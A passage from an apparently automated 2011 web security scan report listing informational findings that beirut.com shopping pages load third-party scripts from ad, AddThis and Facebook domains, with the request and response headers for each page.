<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.655. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:14:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.656. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:54:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.657. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:58:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.658. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:53:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.659. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:16:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.660. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:48:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.661. http://www.beirut.com/Shopping/Consumer-Goods/235690923 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.662. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:03:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.663. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:15:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.664. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:21:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.665. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:39:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.666. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Party-Supplies/25 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Party-Supplies/25

Issue detail

The response dynamically includes the following scripts from other domains:

http://d1.openx.org/ag.php
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Party-Supplies/25 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:50:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
